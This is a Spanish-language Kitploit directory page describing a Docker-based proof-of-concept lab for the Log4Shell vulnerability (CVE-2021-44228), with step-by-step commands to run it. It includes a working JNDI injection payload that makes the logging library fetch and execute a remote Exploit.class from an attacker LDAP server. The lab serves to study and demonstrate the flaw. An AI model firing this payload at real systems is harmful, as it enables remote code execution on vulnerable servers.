Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4j-rce-CVE-2021-44228 — log4j2 CVE-2021-44228 POC | Kitploit
Herramientas/GitHubGitHub/1hakusai1/log4j-rce-cve-2021-44228
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHub1hakusai1/log4j-rce-cve-2021-44228

log4j-rce-CVE-2021-44228

log4j2 CVE-2021-44228 POC

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Resumen

Este es un proyecto para probar la vulnerabilidad de ejecución remota de código de log4j2 (CVE-2021-44228).

Iniciar los contenedores

root@kitploit:~
docker-compose up

El contenedor log4j tarda un poco en estar listo después de iniciarse. Verifique el progreso con el siguiente comando:

root@kitploit:~
docker logs -f log4j

Cuando aparezca Server started: Listening on port 8081, estará listo.

Verificar el estado antes del ataque

Verifique el directorio /root del contenedor log4j:

root@kitploit:~
docker exec log4j ls /root

Inicialmente, solo existe el directorio .

Descargar herramienta
work

Realizar el ataque

Acceda a http://localhost:8081/. Es una aplicación simple que muestra en pantalla y registra en el log el nombre ingresado en el formulario.

Ingrese ${jndi:ldap://ldap.example.com/cn=java,dc=example,dc=com} en el formulario y envíelo.

Verifique el directorio /root del contenedor log4j:

root@kitploit:~
docker exec log4j ls /root

El código preparado por el atacante se habrá ejecutado y debería haber creado archivos que no existían antes. Dado que los nombres de archivo son marcas de tiempo, se agregarán nuevos archivos cada vez que se realice un ataque.

Al verificar los registros del contenedor ldap, puede confirmar que hay solicitudes SEARCH provenientes del contenedor log4j:

root@kitploit:~
docker logs ldap

Al verificar los registros de tomcat en el contenedor web, puede confirmar que hay acceso desde el contenedor log4j a Exploit.class (la clase utilizada para el ataque):

root@kitploit:~
docker exec -it web bash
cat /usr/local/tomcat/logs/localhost_access_log.*